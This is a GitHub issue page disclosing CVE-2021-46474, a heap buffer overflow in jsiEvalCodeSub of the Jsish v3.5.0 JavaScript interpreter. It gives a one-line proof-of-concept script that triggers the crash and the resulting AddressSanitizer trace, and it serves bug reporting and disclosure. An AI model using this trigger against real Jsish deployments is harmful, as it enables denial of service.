Headline
CVE-2021-46474: Heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub · Issue #57 · pcmacdon/jsish
Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsiEvalCodeSub in src/jsiEval.c. This vulnerability can lead to a Denial of Service (DoS).
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Closed
hope-fly opened this issue
Dec 24, 2021
· 1 comment
Comments
Jsish revision
Commit: 9fa798e
Version: v3.5.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
export CFLAGS=’-fsanitize=address’ make
Test case
assert(newObj.hasOwnProperty(“prop”)).throws(SyntaxError, function () { eval(“’use strict’; function _13_0_7_fun() {eval = 42;};”); _13_0_7_fun(); });
Execution steps & Output
$ ./jsish/jsish poc.js
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000028f8 at pc 0x55bcbd952990 bp 0x7ffd837e9530 sp 0x7ffd837e9520 READ of size 8 at 0x6250000028f8 thread T0 #0 0x55bcbd95298f in jsiEvalCodeSub src/jsiEval.c:1366 #1 0x55bcbd95c15e in jsi_evalcode src/jsiEval.c:2204 #2 0x55bcbd960274 in jsi_evalStrFile src/jsiEval.c:2665 #3 0x55bcbd64f66a in Jsi_Main src/jsiInterp.c:936 #4 0x55bcbde5403a in jsi_main src/main.c:47 #5 0x7f3599d46bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #6 0x55bcbd5e3969 in _start (/usr/local/bin/jsish+0xe8969)
0x6250000028f8 is located 8 bytes to the left of 8192-byte region [0x625000002900,0x625000004900) allocated by thread T0 here: #0 0x7f359a9b5f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x55bcbd654972 in Jsi_Realloc src/jsiUtils.c:47
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub Shadow bytes around the buggy address: 0x0c4a7fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c4a7fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c4a7fff8520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ========ABORTING
Credits: Found by OWL337 team.
This issue may have a correlation with #56, but I’m not for sure.
1 participant